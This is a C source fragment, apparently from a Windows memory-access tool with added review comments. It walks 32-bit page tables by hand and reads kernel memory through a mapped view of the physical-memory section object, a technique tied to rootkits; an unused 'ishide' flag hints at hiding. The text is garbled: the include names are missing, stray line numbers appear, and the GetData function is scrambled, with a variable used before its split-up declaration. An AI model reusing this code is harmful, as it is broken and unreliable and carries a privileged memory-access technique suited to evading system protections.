
001 #include

002 //#include

003 #include


typedef LONG NTSTATUS;   // native-API status code; negative values are failures

// Success test for an NTSTATUS: the sign bit is the error bit.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

// Returned when a caller-supplied buffer or length does not match what the call expects.
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

// Returned when the requested access to the object is refused.
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)


// Counted wide string as used by the native API (mirrors ntdef.h UNICODE_STRING).
typedef struct _UNICODE_STRING
{
    USHORT Length;         // length of Buffer in bytes, excluding any terminator
    USHORT MaximumLength;  // capacity of Buffer in bytes
    PWSTR Buffer;          // not guaranteed to be NUL-terminated
} UNICODE_STRING, *PUNICODE_STRING;


// Describes the object a native API call opens or creates (mirrors ntdef.h OBJECT_ATTRIBUTES).
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;                   // sizeof(OBJECT_ATTRIBUTES); the callee validates it
    HANDLE RootDirectory;           // directory ObjectName is relative to, or NULL for an absolute name
    PUNICODE_STRING ObjectName;     // object-manager path of the target
    ULONG Attributes;               // OBJ_* flags (e.g. OBJ_CASE_INSENSITIVE)
    PVOID SecurityDescriptor;       // optional SECURITY_DESCRIPTOR, NULL for the default
    PVOID SecurityQualityOfService; // optional SECURITY_QUALITY_OF_SERVICE, NULL if unused
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;


// Function-pointer type matching the native ZwOpenSection prototype.
// NOTE(review): nothing in this part of the file shows how the pointer is resolved
// (presumably GetProcAddress on ntdll.dll) -- confirm against the caller.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,              // receives the opened section handle
    IN ACCESS_MASK DesiredAccess,           // SECTION_MAP_READ / SECTION_MAP_WRITE etc.
    IN POBJECT_ATTRIBUTES ObjectAttributes  // names the section object to open
);


// Function-pointer type matching ntdll's RtlInitUnicodeString: fills DestinationString so
// that it references SourceString. No copy is made, so SourceString must outlive the
// UNICODE_STRING that describes it.
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString, // receives Length / MaximumLength / Buffer
    IN PCWSTR SourceString                    // NUL-terminated wide string to describe
);


static bool ishide = false;    // not referenced anywhere in this part of the file
// Section handle that LinerAddressToPhysicAddress passes to MapViewOfFile; opened elsewhere.
HANDLE hSection = NULL;
// Mapped view that GetData passes as the page-directory base to LinerAddressToPhysicAddress;
// set elsewhere. NOTE(review): the names suggest a view of the physical-memory section
// object; user-mode opens of that object have been refused since Windows XP SP2 /
// Server 2003 SP1, so the opening code (outside this view) should expect
// STATUS_ACCESS_DENIED on any current system.
PVOID mapPhyMemObject = NULL;


// Translate a virtual address to a physical address by walking the 32-bit non-PAE
// two-level page tables by hand (10-bit directory index, 10-bit table index, 12-bit offset).
//
// Base:    mapped view of the page directory being walked (indexed as ULONG entries).
// address: virtual address to translate.
// Returns: the physical address, or 0 when the PDE or PTE present bit is clear.
//          0 is an in-band sentinel, so a page that genuinely maps to physical 0
//          cannot be told apart from "not present".
//
// Only meaningful for 32-bit non-PAE page tables: pointers are truncated to ULONG and
// the masks below assume 4 KB / 4 MB pages.
// NOTE(review): the MapViewOfFile result is indexed without a NULL check, and the
// "PTE not present" early return skips UnmapViewOfFile, so that path leaks the view.
PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
{
    ULONG VAddress = (ULONG)address;
    ULONG PDE,PTE,PAddress;
    PDE = Base[VAddress>>22];            // top 10 bits index the page directory
    if((PDE&1)==0)                       // bit 0 of the PDE: present
        return 0;
    ULONG PageFlage = PDE&0x00000080;    // bit 7 of the PDE: PS (page size)
    if (PageFlage != 0)
    {
        // PS bit set: 4 MB paging; the PDE holds the frame directly
        PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
    }
    else
    {
        // PS bit clear: 4 KB paging; map the page-table frame and look up the PTE.
        // 4 == FILE_MAP_READ; the view covers one 4 KB page at the frame's offset.
        // Note that PDE is reused here to hold the view's base pointer.
        PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
        PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];   // middle 10 bits index the page table
        if((PTE&1) == 0)                 // PTE present bit clear; the view is not unmapped on this path
            return 0;
        PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
        UnmapViewOfFile((PVOID)PDE);
    }
    return (PVOID)PAddress;
}


070 ULONG GetData(PVOID addr)

071 {

072

ddr);

073 PULONG tmp =

(PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&

0xfffff000,0x1000);

074 if(tmp == 0)

075 return 0;

076 ULONG ret = tmp[(phys&0xfff)>>2];

077 UnmapViewOfFile(tmp);

078 return ret;

ULONG phys =

(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a